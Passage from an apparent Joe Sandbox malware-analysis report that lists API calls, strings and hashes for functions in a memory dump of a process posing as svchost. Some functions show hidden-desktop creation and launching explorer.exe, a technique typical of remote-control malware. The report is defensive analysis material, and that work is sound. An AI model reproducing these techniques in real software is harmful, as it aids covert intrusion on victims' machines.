                                                                                                                                                                                                            Function 02C88F70 Relevance: 4.5, APIs: 3, Instructions: 24threadmemoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 02C88F7E
                                                                                                                                                                                                            • SetThreadPriority.KERNEL32(00000000), ref: 02C88F85
                                                                                                                                                                                                            • VirtualProtect.KERNEL32(02C890E0,00000008,00000000,02C890E0), ref: 02C88F9F
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Thread$CurrentPriorityProtectVirtual
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1494777729-0
                                                                                                                                                                                                            • Opcode ID: 75b85df2a244b49084cb9c6be1fee03f6b29c8988f75ef377feece3f958ed39b
                                                                                                                                                                                                            • Instruction ID: 3d072e8d0ad7959a8a5fc85f18e2cf0cd3f70cfa6d2a8bf5e3b67d3b8feb11de
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 75b85df2a244b49084cb9c6be1fee03f6b29c8988f75ef377feece3f958ed39b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7AE0E5B6E40259EBCF01DFD8E845E9DB778FB48321F008659F915A7240C735A914CB60
                                                                                                                                                                                                            Function 02C82CE0 Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,02C7FB17,02C7FB03,?,02C87515,?,?,?), ref: 02C82CF1
                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,?,?), ref: 02C82CF8
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C82D08
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$AllocateProcessmemset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 983300431-0
                                                                                                                                                                                                            • Opcode ID: 75dbf35bca06dd830f604bb688404d1911218ff929d5c56889fef34081a0ce2d
                                                                                                                                                                                                            • Instruction ID: e39a6daae8fda8d00c1477b3830d4f8cdadd1efeb8606937784db8c4a3b33ff1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 75dbf35bca06dd830f604bb688404d1911218ff929d5c56889fef34081a0ce2d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 75E0CD37F4156262C91611197C0CBD76A18CFC1625F254526BE05D71C1EA11C90582B1
                                                                                                                                                                                                            Function 0040207A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 0040208C
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2676559004.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2676559004.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FreeLibrary
                                                                                                                                                                                                            • String ID: V,@
                                                                                                                                                                                                            • API String ID: 3664257935-3634209070
                                                                                                                                                                                                            • Opcode ID: 2fd4ca95ddf0f334cf370a94dc23c54eb0d0c4c01a3467e788c39c0190814706
                                                                                                                                                                                                            • Instruction ID: d15e959a12f23ccec2fe85088e2afbb8a6d817ea7d7d5b015e5417604cfff27a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2fd4ca95ddf0f334cf370a94dc23c54eb0d0c4c01a3467e788c39c0190814706
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 12D05E76E027298BCB20CF94A5052AEF730FB44731F0043AADE257338083351C118AD4
                                                                                                                                                                                                            Function 02C95870 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 82COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memset
                                                                                                                                                                                                            • String ID: bad pack level
                                                                                                                                                                                                            • API String ID: 2221118986-4081416248
                                                                                                                                                                                                            • Opcode ID: b03a042e19552a90dd51a5fb2fc4d94929bf84e8aa32e981ceed3f8ed88e5d73
                                                                                                                                                                                                            • Instruction ID: 37220f5d33abeed525e7f3057d18b49a3e425549acef86b3ea3ab1fe85dddaf4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b03a042e19552a90dd51a5fb2fc4d94929bf84e8aa32e981ceed3f8ed88e5d73
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F731B7F1A047148ED7219FB9D4842E7B7E6FF46360B40493EE1AE96240D379A182CF53
                                                                                                                                                                                                            Function 02C95B50 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 78COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memcpy.MSVCRT(0001AF70,00022F70,00008000,0001AF70,02C9595C), ref: 02C95B9F
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memcpy
                                                                                                                                                                                                            • String ID: more < 2
                                                                                                                                                                                                            • API String ID: 3510742995-2484782096
                                                                                                                                                                                                            • Opcode ID: aa88fe5c378baad28afa086cd2a7c9a55f108c18b7cbbb39190229aadf341f3b
                                                                                                                                                                                                            • Instruction ID: fa29d854ba3d9dbdf17571427a6aaa4b2709e4821e4193a9d7567c5dea0ee287
                                                                                                                                                                                                            • Opcode Fuzzy Hash: aa88fe5c378baad28afa086cd2a7c9a55f108c18b7cbbb39190229aadf341f3b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5E3170F1610E008BDB268BB4C4487E673E6BF8A358F944A3DD06B562D4D738A586CE43
                                                                                                                                                                                                            Function 02C972B0 Relevance: 3.1, APIs: 2, Instructions: 66fileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memcpy.MSVCRT(?,?,?,00000000,00000068,?,02C974DE,00000068,00000000,00000000,00000000,00000011), ref: 02C972D6
                                                                                                                                                                                                            • ReadFile.KERNEL32(?,?,00004000,?,00000000,00000000,00000068,?,02C974DE,00000068,00000000,00000000,00000000,00000011), ref: 02C9730C
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileReadmemcpy
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1163090680-0
                                                                                                                                                                                                            • Opcode ID: 5e4ab89467c45d4ad976b7c18e4999c846afacf179ef1ccbccb903e84aabe7af
                                                                                                                                                                                                            • Instruction ID: 64d363186c5f4da0c576df7cee4247f317322fc0d375e4a31da46e02b4fe8dde
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5e4ab89467c45d4ad976b7c18e4999c846afacf179ef1ccbccb903e84aabe7af
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B51154B27117045FDB24CA6ADC84A6BF3EDEFD4714B14882DF546C7A40D631E9058B64
                                                                                                                                                                                                            Function 02C76A10 Relevance: 3.0, APIs: 2, Instructions: 9fileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(00000000,00000000,02C879AD,6d1da6b7,?,?,?,?,?,?), ref: 02C76A18
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,?), ref: 02C76A1F
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$AttributesDelete
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2910425767-0
                                                                                                                                                                                                            • Opcode ID: b154332f1c2d15c013d7aa7e7efa14e764507d518ea450a32ec213f8197d7345
                                                                                                                                                                                                            • Instruction ID: 7a1a6bb6f11a735d8f4cbb4645dc26e15627a8d3f55c6b75cf830b046884ff24
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b154332f1c2d15c013d7aa7e7efa14e764507d518ea450a32ec213f8197d7345
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A3B092B1DD2CA26B8F135720590CAAEAA1CEE85B017058A84F901D2001DB288A5186A6
                                                                                                                                                                                                            Function 02C96FA0 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: e255b7937325390c97710c5a88782090207b2db64f4130e14b0bf41065bb860b
                                                                                                                                                                                                            • Instruction ID: c1eb1f6e78f9b7a99b1c8aff115ea89d7a60a05768da011316e2f5c980c18fb3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e255b7937325390c97710c5a88782090207b2db64f4130e14b0bf41065bb860b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AFF01CB4500200AEEF59CF21C65DF597BE4AB85399F59D0C9E0084F6A2CB39C549DF50
                                                                                                                                                                                                            Function 02C766A0 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000001,00000001,00000000), ref: 02C766B7
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileWrite
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3934441357-0
                                                                                                                                                                                                            • Opcode ID: f6c50e1ed5c748e22e93158715b2fcabc35f4e39c71c32a3502fd0c458ac892d
                                                                                                                                                                                                            • Instruction ID: d065e3cc96c4392a53a23273d8844df094d0d0f752270670f2b669e4876b59ef
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f6c50e1ed5c748e22e93158715b2fcabc35f4e39c71c32a3502fd0c458ac892d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4D0C9B595410CBFE740CB84DD0AFAAB7ECD748701F004299BA08C3240E6B16E109BB6
                                                                                                                                                                                                            Function 02C764B0 Relevance: 1.5, APIs: 1, Instructions: 9fileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,02C8CCE2), ref: 02C764C3
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                                            • Opcode ID: d00bf9e2fbff7ed5a6330fb3206c15512381745d3f5a3d9aa4289cf275ea44a3
                                                                                                                                                                                                            • Instruction ID: 0b7ddcf59c93360b0cbdda4d1ebac2838fe4f6a439e6803e9729be378b494429
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d00bf9e2fbff7ed5a6330fb3206c15512381745d3f5a3d9aa4289cf275ea44a3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F0B001B0FC078176FD725661AF1FF0565286740F05F618A80B389BE0C289E47614862E

                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                            Function 02C7C380 Relevance: 103.7, APIs: 55, Strings: 4, Instructions: 429windowsynchronizationmemoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 02C7C3DF
                                                                                                                                                                                                            • SetWindowLongA.USER32(?,000000F0,00000000), ref: 02C7C3EA
                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027), ref: 02C7C3FD
                                                                                                                                                                                                            • GetDlgItem.USER32(?,?), ref: 02C7C412
                                                                                                                                                                                                            • GetWindowLongA.USER32(00000000,000000EB), ref: 02C7C421
                                                                                                                                                                                                            • SetWindowTextA.USER32(?,-00000008), ref: 02C7C42D
                                                                                                                                                                                                            • GetWindowLongA.USER32(00000000,000000F0), ref: 02C7C43C
                                                                                                                                                                                                            • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 02C7C447
                                                                                                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000027), ref: 02C7C45A
                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 02C7C498
                                                                                                                                                                                                            • GetClassLongA.USER32(00000000,000000E6), ref: 02C7C4A8
                                                                                                                                                                                                            • SetClassLongA.USER32(00000000,000000E6,00000000), ref: 02C7C4B7
                                                                                                                                                                                                            • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 02C7C4CF
                                                                                                                                                                                                            • GetObjectA.GDI32(00000000,0000003C,?), ref: 02C7C4D9
                                                                                                                                                                                                            • CreateFontIndirectA.GDI32 ref: 02C7C4EF
                                                                                                                                                                                                            • SendMessageA.USER32(?,00000030,00000000,00000000), ref: 02C7C4FF
                                                                                                                                                                                                            • GetWindow.USER32(00000000,00000005), ref: 02C7C537
                                                                                                                                                                                                            • GetWindow.USER32(00000000), ref: 02C7C53A
                                                                                                                                                                                                            • GetWindowInfo.USER32(00000000,?), ref: 02C7C54E
                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 02C7C5B3
                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,00000116,?,00000200), ref: 02C7C5DD
                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 02C7C5E9
                                                                                                                                                                                                            • MoveWindow.USER32(?,00000009,00000014,000000FC,00000014,00000001), ref: 02C7C605
                                                                                                                                                                                                            • CreateWindowExA.USER32(00000000,static,00000000,50000003,?,0000000A,00000023,00000027,?,00000000,00000000,00000000), ref: 02C7C62A
                                                                                                                                                                                                            • SetWindowLongA.USER32(00000000,000000F4,?), ref: 02C7C63C
                                                                                                                                                                                                            • GetClassLongA.USER32(00000000,000000E6), ref: 02C7C645
                                                                                                                                                                                                            • SetClassLongA.USER32(00000000,000000E6,00000000), ref: 02C7C654
                                                                                                                                                                                                            • GetWindowTextLengthA.USER32(00000000), ref: 02C7C65B
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,00000008,0000000C), ref: 02C7C66F
                                                                                                                                                                                                            • SetWindowLongA.USER32(00000000,000000EB,00000000), ref: 02C7C693
                                                                                                                                                                                                            • SendMessageA.USER32(00000000,0000007F,00000001,00000000), ref: 02C7C6A0
                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(00000000,?), ref: 02C7C6B0
                                                                                                                                                                                                            • GetClassLongA.USER32(00000000,000000DE), ref: 02C7C6CC
                                                                                                                                                                                                            • GetClassLongA.USER32(00000000,000000F2), ref: 02C7C6D5
                                                                                                                                                                                                            • LoadIconA.USER32(00000000,00007F00), ref: 02C7C6E1
                                                                                                                                                                                                            • SendMessageA.USER32(00000000,00000172,00000001,00000000), ref: 02C7C6FB
                                                                                                                                                                                                            • GetWindowLongA.USER32(00000000,000000F0), ref: 02C7C724
                                                                                                                                                                                                            • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 02C7C733
                                                                                                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000027), ref: 02C7C746
                                                                                                                                                                                                            • GetWindow.USER32(00000000,00000003), ref: 02C7C769
                                                                                                                                                                                                            • IsIconic.USER32(?), ref: 02C7C787
                                                                                                                                                                                                            • ShowWindow.USER32(?,00000001), ref: 02C7C794
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C7C7A3
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C7C7BB
                                                                                                                                                                                                              • Part of subcall function 02C7C330: GetWindowThreadProcessId.USER32(?,00000000), ref: 02C7C33C
                                                                                                                                                                                                              • Part of subcall function 02C7C330: GetCurrentThreadId.KERNEL32 ref: 02C7C344
                                                                                                                                                                                                              • Part of subcall function 02C7C330: AttachThreadInput.USER32(00000000,00000000,00000001), ref: 02C7C350
                                                                                                                                                                                                              • Part of subcall function 02C7C330: SendMessageA.USER32(?,0000000D,?,?), ref: 02C7C361
                                                                                                                                                                                                              • Part of subcall function 02C7C330: AttachThreadInput.USER32(00000000,00000000,00000000), ref: 02C7C36D
                                                                                                                                                                                                            • PostMessageA.USER32(?,00000010,00000000,00000000), ref: 02C7C7C8
                                                                                                                                                                                                            • GetDlgItem.USER32(?,?), ref: 02C7C837
                                                                                                                                                                                                            • GetWindowLongA.USER32(00000000), ref: 02C7C83E
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C7C84E
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C7C868
                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000000), ref: 02C7C87D
                                                                                                                                                                                                            • GetWindowLongA.USER32(00000000,000000EB), ref: 02C7C88C
                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 02C7C898
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02C7C8A7
                                                                                                                                                                                                            • DestroyWindow.USER32(00000000), ref: 02C7C8AE
                                                                                                                                                                                                            • EndDialog.USER32(?,00000000), ref: 02C7C8C3
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Window$Long$ClassMessage$SendThread$ItemObject$AttachCreateHeapInputMutexProcessRectReleaseSingleTextWait$AllocClientCurrentDeleteDestroyDialogFontFreeIconIconicIndirectInfoLengthLoadMovePostShow
                                                                                                                                                                                                            • String ID: '$<$P0Wu$static
                                                                                                                                                                                                            • API String ID: 2592195760-2115307949
                                                                                                                                                                                                            • Opcode ID: ef69f0a1398285c23b71343fc943ffede84846a0e686b3e3f8ebdbed849b94b7
                                                                                                                                                                                                            • Instruction ID: fd7e9198ded1431252ecc94c8436da75a98c5ce6b82cbdab1c8a503a73804f3d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ef69f0a1398285c23b71343fc943ffede84846a0e686b3e3f8ebdbed849b94b7
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FDE19E71A84341AFD3128F64EC88F6A7BA8FB88725F104F19F51AD72C0CB749A51CB61
                                                                                                                                                                                                            Function 02C786C0 Relevance: 66.8, APIs: 32, Strings: 6, Instructions: 260threadsleepprocessCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateDesktopA.USER32 ref: 02C78711
                                                                                                                                                                                                            • SetThreadDesktop.USER32(00000000), ref: 02C7872A
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C78738
                                                                                                                                                                                                            • CreateProcessA.KERNEL32 ref: 02C7877C
                                                                                                                                                                                                            • GetShellWindow.USER32 ref: 02C78788
                                                                                                                                                                                                            • Sleep.KERNEL32(0000000A), ref: 02C787A2
                                                                                                                                                                                                            • GetShellWindow.USER32 ref: 02C787A4
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C787D3
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C787E1
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C787FB
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C78809
                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 02C7880F
                                                                                                                                                                                                            • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 02C78820
                                                                                                                                                                                                            • RegisterWindowMessageA.USER32(92f35800a), ref: 02C78848
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000083D0,00000000,00000000,00000000), ref: 02C7885D
                                                                                                                                                                                                            • SetThreadDesktop.USER32(?), ref: 02C788A7
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C788B8
                                                                                                                                                                                                            • CreateProcessA.KERNEL32 ref: 02C78905
                                                                                                                                                                                                            • GetShellWindow.USER32 ref: 02C78911
                                                                                                                                                                                                            • Sleep.KERNEL32(0000000A), ref: 02C78924
                                                                                                                                                                                                            • GetShellWindow.USER32 ref: 02C78926
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(?,?), ref: 02C78955
                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 02C78963
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C7897D
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C7898B
                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 02C78991
                                                                                                                                                                                                            • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 02C789A2
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000083D0,00000000,00000000,00000000), ref: 02C789CF
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Window$Handle$CreateDesktop$CloseInformationShellThread$FindProcessSleepmemset$MessageRegister
                                                                                                                                                                                                            • String ID: 92f35800a$D$D$Shell_TrayWnd$c:\windows$c:\windows\explorer.exe
                                                                                                                                                                                                            • API String ID: 340731545-2838640940
                                                                                                                                                                                                            • Opcode ID: 6dd0f8fbc857005d8b0945f724dcaca625a5c1f17fb0552f53a02aafc3d7cc02
                                                                                                                                                                                                            • Instruction ID: 44ee53593746ed547ee0629c9a9b28ec431908d50eb276aea1e373b7e83b79d8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6dd0f8fbc857005d8b0945f724dcaca625a5c1f17fb0552f53a02aafc3d7cc02
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 029148B1988350AFD312DF65D848B5BBBE8EF88754F108F5AF64983240DB748515CFA2
                                                                                                                                                                                                            Function 02C911C0 Relevance: 63.4, APIs: 27, Strings: 9, Instructions: 376COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C911DE
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C911F8
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 02C91222
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA718), ref: 02C91247
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 02C91287
